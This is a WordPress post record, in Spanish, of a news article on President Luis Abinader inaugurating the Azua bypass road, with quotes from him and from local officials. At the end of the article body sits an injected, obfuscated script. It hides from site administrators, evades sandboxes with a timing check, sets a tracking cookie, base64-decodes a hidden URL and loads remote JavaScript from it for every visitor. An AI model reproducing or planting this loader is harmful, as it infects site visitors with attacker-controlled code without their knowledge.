{"id":14106,"date":"2023-02-16T08:35:13","date_gmt":"2023-02-16T12:35:13","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14106"},"modified":"2023-02-16T08:35:13","modified_gmt":"2023-02-16T12:35:13","slug":"presidente-abinader-invita-oposicion-a-caerle-atras-y-lo-vean-trabajando-por-el-desarrollo-del-pais","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14106","title":{"rendered":"Presidente Abinader invita oposici\u00f3n a caerle atr\u00e1s y lo vean trabajando por el desarrollo del pa\u00eds"},"content":{"rendered":"<p>Azua.-\u00a0<strong>El Presidente Luis Abinader<\/strong>\u00a0inaugur\u00f3 este mi\u00e9rcoles la\u00a0<strong>Circunvalaci\u00f3n de Azua,<\/strong>\u00a0que agilizar\u00e1 el tr\u00e1nsito vehicular desde y hacia las\u00a0<strong>nueve provincias<\/strong>\u00a0de las regiones Sur, Sur-Central y Suroeste. Esta inauguraci\u00f3n salda una deuda acumulada durante muchas d\u00e9cadas y de forma integral posibilitar\u00e1\u00a0<strong>el despegue definitivo que necesita esta regi\u00f3n para consolidar su desarrollo.\u00a0<\/strong><\/p>\n<p>El mandatario destac\u00f3 que la construcci\u00f3n de esta obra, con una inversi\u00f3n de m\u00e1s de\u00a0<strong>5,000 millones de pesos<\/strong>, beneficia a una poblaci\u00f3n de m\u00e1s de\u00a0<strong>800,000 habitantes<\/strong>\u00a0y pasa por comunidades como el Proyecto Emma Balaguer, Playa Monte R\u00edo, La Estancia, Puerto Viejo, Las Clavelinas, La Ceiba, La Ci\u00e9nega, Sabana Yegua, Las Bar\u00edas, El Rosario y Zona Franca de Azua, las cuales ver\u00e1n dinamizadas sus econom\u00edas locales y sentir\u00e1n el crecimiento econ\u00f3mico, as\u00ed como el impacto en sus propias vidas y familias.<\/p>\n<p>El Presidente Abinader aprovech\u00f3 el acto para referirse a las cr\u00edticas de opositores de que el Gobierno s\u00f3lo daba palazos y picazos invit\u00e1ndolos a que a partir de ahora le caigan atr\u00e1s.<\/p>\n<p><em>\u201cRespondemos con hechos y el que me quiera ver que me caiga atr\u00e1s\u201d<\/em>, recalc\u00f3 el mandatario.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/2_151.jpg\" alt=\"\" width=\"1024\" height=\"683\" data-entity-type=\"file\" data-entity-uuid=\"102f0802-55bf-458e-8c84-4940772da454\" \/><\/p>\n<p>Refiri\u00e9ndose a la obra que estaba dejando en funcionamiento, dijo que la misma representa un gran impulso al gran\u00a0<strong>Circuito Vial Sur, dise\u00f1ado de manera muy consciente para facilitar la movilidad en toda la regi\u00f3n<\/strong>, con la adecuaci\u00f3n de carreteras y la construcci\u00f3n de nuevas v\u00edas para responder a la demanda de los habitantes que utilizan estas carreteras.<\/p>\n<p>En ese sentido, indic\u00f3 que este Circuito Vial Sur ha sido concebido como uno de los pilares sobre los que est\u00e1n basando el gran proyecto de\u00a0<strong>desarrollo integral de toda la regi\u00f3n Sur\u00a0<\/strong>y que su puesta en funcionamiento facilita la conexi\u00f3n directa y fluida entre las nueve provincias de la regi\u00f3n, conect\u00e1ndolas con Santo Domingo y con el Distrito Nacional. As\u00ed se logra un beneficio significativo para los usuarios de esta carretera con la\u00a0<strong>reducci\u00f3n de tiempo y distancia.<\/strong><\/p>\n<p>El gobernante expuso que esta obra con inicio en la entrada de la ciudad de Azua, hace un recorrido de 13.5 kil\u00f3metros para reencontrarse con la carretera S\u00e1nchez, pasando el r\u00edo Jura, a la entrada de la comunidad de Los Jovillos, y tambi\u00e9n muy cerca de la Zona Franca de Azua.<\/p>\n<p>Se\u00f1al\u00f3 que la obra en 8 a\u00f1os hab\u00eda avanzado menos de un 30 % y en tan solo un a\u00f1o, en su gesti\u00f3n de Gobierno, se termin\u00f3 el restante 70 %.<\/p>\n<p><em>\u00abNo respondemos las imputaciones normales de una sociedad democr\u00e1tica de la oposici\u00f3n; no lo respondemos verbalmente, lo respondemos con hechos. Y el que quiera ver que me caiga atr\u00e1s, a ver un verdadero plan de desarrollo, plan que est\u00e1 dando resultados, no porque lo diga el Gobierno, sino porque lo dicen todas las estad\u00edsticas\u00bb,<\/em>\u00a0expres\u00f3 el Presidente Abinader.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/enterarterd.com\/wp-content\/uploads\/2025\/12\/3_35.jpg\" alt=\"\" width=\"1024\" height=\"683\" data-entity-type=\"file\" data-entity-uuid=\"d05e3ff2-545c-4be4-96d4-43b97e4ca67b\" \/><\/p>\n<p><strong>Obra ha sobrepasado con creces las expectativas<\/strong><\/p>\n<p>La obra, que inici\u00f3 su construcci\u00f3n durante el Gobierno del expresidente Hip\u00f3lito Mej\u00eda, dijo,\u00a0<strong>ha sobrepasado con creces las expectativas<\/strong>\u00a0que en un principio ten\u00edan, gracias a la alta calidad de su construcci\u00f3n, los elementos adicionales y modernos que la complementan, as\u00ed como el paisajismo y lo panor\u00e1mico de esta v\u00eda, que da una muy buena impresi\u00f3n y cambia por completo la cara a esta importante provincia de Azua.<\/p>\n<p>Esto beneficiar\u00e1 enormemente, agreg\u00f3, al\u00a0<strong>gran desarrollo tur\u00edstico que hemos iniciado en la provincia de Pedernales,<\/strong>\u00a0donde el Gobierno tiene grandes iniciativas e inversiones en el \u00e1rea tur\u00edstica, ya que los viajes por carretera desde y hacia esa zona pasan necesariamente por Azua, haciendo que entre esos dos puntos\u00a0<strong>los conductores se ahorren por lo menos una hora y media de recorrido.<\/strong><\/p>\n<p><strong>Transformar radicalmente la Rep\u00fablica Dominicana<\/strong><\/p>\n<p>Manifest\u00f3 que la manera m\u00e1s eficaz de propiciar el cambio que promueve es asumiendo\u00a0<strong>la responsabilidad de transformar radicalmente a la Rep\u00fablica Dominicana<\/strong>\u00a0y empezando a hacerlo por las arterias que la comunican a lo largo y ancho del pa\u00eds.<\/p>\n<p>Es por eso, dijo, que dio prioridad a la construcci\u00f3n de esta\u00a0<strong>important\u00edsima v\u00eda<\/strong>\u00a0que hoy inaugura, la Avenida Circunvalaci\u00f3n Sur de la hist\u00f3rica y valiente Ciudad de Azua de Compostela, Primada del Sur.<\/p>\n<p><em>\u00abDesde antes de juramentarme como Presidente tuve muy claro cu\u00e1les eran los objetivos que quer\u00eda alcanzar para nuestro pa\u00eds y qu\u00e9 cosas quer\u00eda dejar como legado al pueblo que confi\u00f3 en m\u00ed y en el proyecto de Gobierno que encabezo desde entonces. Y en mis pensamientos siempre estuvo hacer todo lo posible por pagar la deuda hist\u00f3rica que tiene el pa\u00eds con la regi\u00f3n Sur\u00bb,<\/em>\u00a0expres\u00f3 el Presidente Abinader.<\/p>\n<p>El gobernante llam\u00f3 a la poblaci\u00f3n a cuidar el desarrollo y el progreso y asegur\u00f3 que el Gobierno est\u00e1 dispuesto a seguir actuando con la\u00a0<strong>transparencia<\/strong>\u00a0que le ha caracterizado.<\/p>\n<p><em>\u00abMis queridos azuanos y mis queridos amigos de todas las provincias del Sur, nos toca con esta obra y con las dem\u00e1s que he mencionado, con el desarrollo de Pedernales y con el Plan San Juan, vamos a defender el progreso y el desarrollo del sur y de la Rep\u00fablica Dominicana\u00bb<\/em>, concluy\u00f3 el jefe de Estado.<\/p>\n<p><strong>Fondos locales del Presupuesto Nacional y recursos del Fideicomiso RD-Vial<\/strong><\/p>\n<p>De su lado,\u00a0<strong>el Ministro de Obras P\u00fablicas, Deligne Ascenci\u00f3n<\/strong>, explic\u00f3 que los recursos para esta importante obra fueron provenientes de\u00a0<strong>fondos locales del Presupuesto Nacional y recursos del Fideicomiso RD-Vial<\/strong>, producto de las recaudaciones por el pago en las estaciones de peaje que realizan los ciudadanos cuando transitan por las autopistas troncales en todo el pa\u00eds.<\/p>\n<p>Afirm\u00f3 que\u00a0<strong>en esta regi\u00f3n nunca antes se hab\u00eda hecho una inversi\u00f3n de tanto alcance<\/strong>\u00a0como la que ejecuta el actual Gobierno y precis\u00f3 que la obra que hoy se inaugura fue encontrada en un 30 % ejecuci\u00f3n desde su inicio en el a\u00f1o 2012, ya que hab\u00edan agotado su presupuesto y la adenda del 25 % para poder continuar con los trabajos de construcci\u00f3n de la obra.<\/p>\n<p><em>\u00abEsta es una obra que desde el a\u00f1o 2012 se comenz\u00f3 a construir bajo una declaratoria de emergencia, pero pasaron 8 a\u00f1os y en esos 8 a\u00f1os tan solo se lleg\u00f3 a abarcar un 30 % de ejecuci\u00f3n y que usted al llegar retom\u00f3 y que fue necesario incluirla en la Ley 128-21 que posibilitaba que obras que hab\u00edan agotado su presupuesto y la adenda del 25 % para poder continuar y concluir los trabajos de construcci\u00f3n de la obra\u201d,<\/em>\u00a0explic\u00f3 Ascenci\u00f3n.<\/p>\n<p>Ascenci\u00f3n indic\u00f3 que la nueva v\u00eda, al circunvalar el casco urbano de Azua, permitir\u00e1 la\u00a0<strong>disminuci\u00f3n del congestionamiento vial<\/strong>\u00a0en el centro de la ciudad, la contaminaci\u00f3n ambiental, los altos costos operacionales y el mayor tiempo de viaje que sufren en la actualidad tanto los residentes en esta localidad como los usuarios del tr\u00e1fico de paso que se desplaza a las\u00a0<strong>regiones Valdesia, El Valle y Enriquillo<\/strong>.<\/p>\n<p>Refiri\u00f3 que el\u00a0<strong>impacto econ\u00f3mico y social<\/strong>\u00a0que tendr\u00e1 la nueva circunvalaci\u00f3n se explica porque esta forma parte del circuito vial que componen el mejoramiento y ampliaci\u00f3n de la autopista 6 de Noviembre, junto con la Circunvalaci\u00f3n de Ban\u00ed, as\u00ed como la reconstrucci\u00f3n y modernizaci\u00f3n de las carreteras Barahona-Enriquillo y Enriquillo- Pedernales.<\/p>\n<p>En tanto,\u00a0<strong>la gobernadora de Azua, \u00c1ngela P\u00e9rez D\u00edaz<\/strong>, describi\u00f3 como trascendental esta circunvalaci\u00f3n que hoy entrega el mandatario, la cual\u00a0<strong>transforma y lleva desarrollo a la regi\u00f3n<\/strong>\u00a0y que no hubiera sido posible sin el respaldo y el amor del Presidente Abinader por esta provincia.<\/p>\n<p>Asimismo,\u00a0<strong>la senadora de Azua, L\u00eda Ynocencia D\u00edaz<\/strong>, expres\u00f3 que el Presidente Abinader ha hecho realidad los sue\u00f1os de los azuanos y\u00a0<strong>la provincia ha visto un renacer\u00a0<\/strong>en su gesti\u00f3n rescatando obras detenidas por d\u00e9cadas, como el caso de esta circunvalaci\u00f3n que llevaba detenida 10 a\u00f1os y en tan solo un a\u00f1o, en su mandato fue terminada.<\/p>\n<p>Mientras que\u00a0<strong>el alcalde de Azua, Ruddy Gonz\u00e1lez,<\/strong>\u00a0manifest\u00f3 que con la llegada del Presidente Abinader, el\u00a0<strong>pa\u00eds tiene norma y direcci\u00f3n y la honradez con la que act\u00faa este Gobierno.<\/strong><\/p>\n<p><strong>La bendici\u00f3n del acto estuvo a cargo del padre Jos\u00e9 Duvan L\u00f3pez.<\/strong><\/p>\n<p>Acompa\u00f1aron al mandatario, el Ministro Administrativo de la Presidencia, Jos\u00e9 Ignacio Paliza; de Agricultura, Limber Cruz, el viceministro Administrativo y Financiero de la Presidencia, Igor Rodr\u00edguez, y el alcalde de Los Jovillos, Tom\u00e1s Contreras, junto a los diputados Brenda Ogando y Carlos Ram\u00edrez.<\/p>\n<p>Tambi\u00e9n, el director del Instituto Nacional de Aguas Potables y Alcantarillados (INAPA), Wellington Arnaud; del Instituto Nacional de Recursos Hidr\u00e1ulicos (INDRHI), Olmedo Caba, y la alcaldesa de San Juan, Hanoi S\u00e1nchez, adem\u00e1s de los contratistas de la obra, Marcos Malesp\u00edn y Albert Saillant.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Azua.-\u00a0El Presidente Luis Abinader\u00a0inaugur\u00f3 este mi\u00e9rcoles la\u00a0Circunvalaci\u00f3n de Azua,\u00a0que agilizar\u00e1 el tr\u00e1nsito vehicular desde y hacia las\u00a0nueve provincias\u00a0de las regiones Sur, Sur-Central y Suroeste. Esta inauguraci\u00f3n salda una deuda acumulada durante muchas d\u00e9cadas y de forma integral posibilitar\u00e1\u00a0el despegue definitivo que necesita esta regi\u00f3n para consolidar su desarrollo.\u00a0 El mandatario destac\u00f3 que la construcci\u00f3n de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14108,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14106","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14106"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14106\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/14108"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14106"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}